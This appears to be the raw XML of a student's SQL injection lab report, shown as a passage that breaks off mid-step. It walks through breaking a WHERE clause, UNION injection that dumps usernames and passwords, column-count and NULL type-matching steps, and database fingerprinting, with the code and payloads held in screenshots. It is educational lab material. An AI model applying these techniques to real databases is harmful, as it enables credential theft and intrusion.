          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B5F855A" wp14:editId="4978AFA9">
            <wp:extent cx="5731510" cy="1431290"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2662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7399" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1431290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD32104" w14:textId="78669811" w:rsidR="00A17F45" w:rsidRDefault="00A5572D" w:rsidP="00341B58">
      <w:r>
        <w:t>Browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEF5C28" w14:textId="78C16D82" w:rsidR="00A5572D" w:rsidRDefault="00A5572D" w:rsidP="00341B58">
      <w:r w:rsidRPr="00A5572D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F931FE5" wp14:editId="0168A388">
            <wp:extent cx="5731510" cy="2974340"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="98977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7596" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2974340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F74DAB" w14:textId="77777777" w:rsidR="00CE637A" w:rsidRDefault="00CE637A">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDFCBDB" w14:textId="1FE0183F" w:rsidR="00CE637A" w:rsidRDefault="00CE637A" w:rsidP="00341B58">
      <w:r w:rsidRPr="00CE637A">
        <w:lastRenderedPageBreak/>
        <w:t>Step1: Normal input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39230C4F" w14:textId="70AE35A5" w:rsidR="00CE637A" w:rsidRDefault="00CE637A" w:rsidP="00CE637A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE637A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="664CE4AA" wp14:editId="1ACB36EC">
            <wp:extent cx="3492500" cy="2095268"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="12084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8481" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3524203" cy="2114288"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="287A70F7" w14:textId="082D965C" w:rsidR="009936F8" w:rsidRPr="009936F8" w:rsidRDefault="009936F8" w:rsidP="009936F8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009936F8">
        <w:t>2 book results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27332353" w14:textId="6F4C6312" w:rsidR="009936F8" w:rsidRDefault="009936F8" w:rsidP="00341B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009936F8">
        <w:t>The SQL query printed on screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DDB61C" w14:textId="77777777" w:rsidR="00573363" w:rsidRPr="00573363" w:rsidRDefault="00FE0161" w:rsidP="00573363">
      <w:r w:rsidRPr="00573363">
        <w:t xml:space="preserve">Step2: </w:t>
      </w:r>
      <w:r w:rsidR="00573363" w:rsidRPr="00573363">
        <w:t>Break the WHERE clause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A313C2" w14:textId="484563B0" w:rsidR="00573363" w:rsidRDefault="009967A7" w:rsidP="009967A7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009967A7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="290E246A" wp14:editId="22FB19E4">
            <wp:extent cx="3702050" cy="1803037"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="98212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20204" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3715010" cy="1809349"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D02A22C" w14:textId="77777777" w:rsidR="002B4583" w:rsidRPr="002B4583" w:rsidRDefault="002B4583" w:rsidP="002B4583">
      <w:r w:rsidRPr="002B4583">
        <w:t>What happens:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79144A2C" w14:textId="77777777" w:rsidR="002B4583" w:rsidRPr="002B4583" w:rsidRDefault="002B4583" w:rsidP="002B4583">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4583">
        <w:t>The WHERE condition becomes always true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6E722C" w14:textId="77777777" w:rsidR="002B4583" w:rsidRPr="002B4583" w:rsidRDefault="002B4583" w:rsidP="002B4583">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4583">
        <w:t>All books are returned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1EC2F3" w14:textId="77777777" w:rsidR="002B4583" w:rsidRDefault="002B4583" w:rsidP="002B4583">
      <w:r w:rsidRPr="002B4583">
        <w:t>This shows basic SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0371C830" w14:textId="49EC97F7" w:rsidR="002B4583" w:rsidRPr="002B4583" w:rsidRDefault="006B43F6" w:rsidP="002B4583">
      <w:r>
        <w:t xml:space="preserve">Step3: </w:t>
      </w:r>
      <w:r w:rsidRPr="006B43F6">
        <w:t>UNION injection (the real attack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F57A31" w14:textId="423546F7" w:rsidR="002B4583" w:rsidRDefault="00FE6C8A" w:rsidP="00FE6C8A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE6C8A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10F042E2" wp14:editId="04D89287">
            <wp:extent cx="3778250" cy="1610340"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="88532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6878" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3796656" cy="1618185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="699473E8" w14:textId="77777777" w:rsidR="00264061" w:rsidRDefault="00264061">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D29F68E" w14:textId="018BC1BF" w:rsidR="00CB36A8" w:rsidRPr="00CB36A8" w:rsidRDefault="00DC794D" w:rsidP="00CB36A8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>What we see</w:t>
      </w:r>
      <w:r w:rsidR="00CB36A8" w:rsidRPr="00CB36A8">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE470E4" w14:textId="77777777" w:rsidR="00CB36A8" w:rsidRPr="00CB36A8" w:rsidRDefault="00CB36A8" w:rsidP="00CB36A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB36A8">
        <w:t>Normal book results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCBA35B" w14:textId="77777777" w:rsidR="00CB36A8" w:rsidRPr="00CB36A8" w:rsidRDefault="00CB36A8" w:rsidP="00CB36A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB36A8">
        <w:t>Extra rows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4246D3AB" w14:textId="77777777" w:rsidR="00CB36A8" w:rsidRPr="00CB36A8" w:rsidRDefault="00CB36A8" w:rsidP="00CB36A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB36A8">
        <w:t xml:space="preserve">usernames appear under </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB36A8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Author</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32331978" w14:textId="77777777" w:rsidR="00CB36A8" w:rsidRPr="00CB36A8" w:rsidRDefault="00CB36A8" w:rsidP="00CB36A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB36A8">
        <w:t xml:space="preserve">passwords appear under </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB36A8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Title</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D64DBF8" w14:textId="77777777" w:rsidR="00CB36A8" w:rsidRPr="00264061" w:rsidRDefault="00CB36A8" w:rsidP="00CB36A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB36A8">
        <w:t xml:space="preserve">uid appears under </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB36A8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Year</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB3EBF4" w14:textId="10EFA286" w:rsidR="00264061" w:rsidRDefault="00EC7813" w:rsidP="00264061">
      <w:r>
        <w:t>Step4: Wrong column count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EA5005" w14:textId="484F551C" w:rsidR="00EC7813" w:rsidRDefault="00E16F90" w:rsidP="00264061">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E16F90">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2680FE19" wp14:editId="06E32B74">
            <wp:extent cx="5731510" cy="2110105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="80063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8152" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2110105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="114E5394" w14:textId="7ED14DD2" w:rsidR="005975D3" w:rsidRPr="005975D3" w:rsidRDefault="005975D3" w:rsidP="005975D3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="005975D3">
        <w:t>We got an error:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005975D3">
        <w:t>SQLite complains about column mismatch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64614FEA" w14:textId="44619019" w:rsidR="00CB36A8" w:rsidRDefault="0041586F" w:rsidP="00CB36A8">
      <w:r>
        <w:t xml:space="preserve">Step5: </w:t>
      </w:r>
      <w:r w:rsidRPr="0041586F">
        <w:t>Data type mismatch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCCB781" w14:textId="37B0797B" w:rsidR="0041586F" w:rsidRDefault="0041586F" w:rsidP="00CB36A8">
      <w:r w:rsidRPr="0041586F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="083125D9" wp14:editId="14F9BBA1">
            <wp:extent cx="5731510" cy="2614295"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="207169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4805" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2614295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B8177C" w14:textId="77777777" w:rsidR="0041586F" w:rsidRPr="0041586F" w:rsidRDefault="0041586F" w:rsidP="0041586F">
      <w:r w:rsidRPr="0041586F">
        <w:t>SQLite tries to put text into a numeric column → error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D095698" w14:textId="77777777" w:rsidR="00FA62E2" w:rsidRDefault="00FA62E2">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A2DF70" w14:textId="158511D2" w:rsidR="0041586F" w:rsidRDefault="00FA62E2" w:rsidP="00CB36A8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step6: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA62E2">
        <w:t>Using NULL to fix types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3927AFD3" w14:textId="46683734" w:rsidR="00FA62E2" w:rsidRDefault="00FA62E2" w:rsidP="00CB36A8">
      <w:r w:rsidRPr="00FA62E2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="271A9FE2" wp14:editId="3B35AEF0">
            <wp:extent cx="5731510" cy="2494915"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="17829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950" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2494915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E89321D" w14:textId="21719AD0" w:rsidR="0053718A" w:rsidRPr="0053718A" w:rsidRDefault="0053718A" w:rsidP="0053718A">
      <w:r w:rsidRPr="0053718A">
        <w:t>Now it works again.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0053718A">
        <w:t>This shows why attackers use NULL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0A2B07" w14:textId="77777777" w:rsidR="00CF599B" w:rsidRPr="00A56427" w:rsidRDefault="00CF599B" w:rsidP="00CF599B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C62216">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Injecting into Interpreted Languages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5233AE62" w14:textId="724330F2" w:rsidR="00A65CA2" w:rsidRDefault="00A65CA2" w:rsidP="00A65CA2">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65CA2">
        <w:t>Database fingerprinting is used to identify the type and version of a back-end database so that advanced attacks can be tailored correctly. This can be done by testing database-specific behavio</w:t>
      </w:r>
      <w:r w:rsidR="000837E1">
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65CA2">
        <w:t>rs such as string concatenation methods and numeric functions. MS-SQL and Sybase share many similarities, making them vulnerable to the same techniques. MySQL’s version-based comment execution can also be abused to determine the exact database version in use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFC8990" w14:textId="149E4AD7" w:rsidR="00B10E66" w:rsidRPr="00A56427" w:rsidRDefault="00B10E66" w:rsidP="00B10E66">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B10E66">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Extracting Useful Data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FAFE16" w14:textId="57AB3228" w:rsidR="007967DB" w:rsidRDefault="00017AF9" w:rsidP="00017AF9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00017AF9">
        <w:t>This section describes how attackers extract sensitive data from a database using SQL injection. By identifying column counts and string-compatible fields, they can display injected query results. Database metadata tables reveal the names of tables and columns, including those storing credentials. Once this structure is known, attackers can directly retrieve usernames, passwords, and other sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1131F305" w14:textId="77777777" w:rsidR="00F6016E" w:rsidRDefault="00F6016E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E788D19" w14:textId="78312A55" w:rsidR="00F6016E" w:rsidRPr="00F6016E" w:rsidRDefault="00F6016E" w:rsidP="00F6016E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F6016E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>UNION-Based SQL Injection Lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDB3B22" w14:textId="6B3E32C4" w:rsidR="00F6016E" w:rsidRDefault="00F6016E" w:rsidP="00F6016E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>App.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3BF3F1" w14:textId="07FC74DA" w:rsidR="00F6016E" w:rsidRDefault="00F6016E" w:rsidP="00F6016E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F6016E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B1B7B2D" wp14:editId="4558BC00">
            <wp:extent cx="5731510" cy="3607435"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="82798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85534" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3607435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="115335F6" w14:textId="73459240" w:rsidR="00DB397A" w:rsidRDefault="00DB397A" w:rsidP="00F6016E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Setup_db.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A83695" w14:textId="28571F9F" w:rsidR="00DB397A" w:rsidRDefault="00DB397A" w:rsidP="00DB397A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB397A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3164E42A" wp14:editId="02B9C349">
            <wp:extent cx="4643057" cy="4260850"/>
            <wp:effectExtent l="0" t="0" r="5715" b="6350"/>
            <wp:docPr id="32998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7362" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4654278" cy="4271148"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADB74E6" w14:textId="717AA045" w:rsidR="00515E15" w:rsidRDefault="00515E15" w:rsidP="00515E15">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6800A51F" w14:textId="43DDB3AA" w:rsidR="00515E15" w:rsidRDefault="00515E15" w:rsidP="00515E15">
      <w:r w:rsidRPr="00515E15">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B425BB9" wp14:editId="4F4E1C3F">
            <wp:extent cx="5731510" cy="1441450"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="18874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4798" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1441450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D07F625" w14:textId="0B83EB8B" w:rsidR="007D5602" w:rsidRDefault="007D5602" w:rsidP="00515E15">
      <w:r>
        <w:t>Browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36655A25" w14:textId="30387D03" w:rsidR="007D5602" w:rsidRDefault="007D5602" w:rsidP="00515E15">
      <w:r w:rsidRPr="007D5602">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0220A047" wp14:editId="74029ECF">
            <wp:extent cx="5731510" cy="1816100"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="54120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06165" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1816100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5E5043" w14:textId="7FFA466C" w:rsidR="007D5602" w:rsidRDefault="007D5602" w:rsidP="00515E15">
      <w:r>
        <w:t xml:space="preserve">Step1: </w:t>
      </w:r>
      <w:r w:rsidR="00940B80" w:rsidRPr="00940B80">
        <w:t>Normal search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1233A6" w14:textId="0E47845A" w:rsidR="007D5602" w:rsidRDefault="007D5602" w:rsidP="00515E15">
      <w:r w:rsidRPr="007D5602">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68AD2C09" wp14:editId="601312C9">
            <wp:extent cx="5731510" cy="1816100"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="137539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6943" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1816100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="177FB59E" w14:textId="58581B51" w:rsidR="00AF3AC1" w:rsidRDefault="00F831A9" w:rsidP="00AF3AC1">
      <w:r>
        <w:t xml:space="preserve">Step2: (Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F831A9">
        <w:t>Find number of columns</w:t>
      </w:r>
      <w:r>
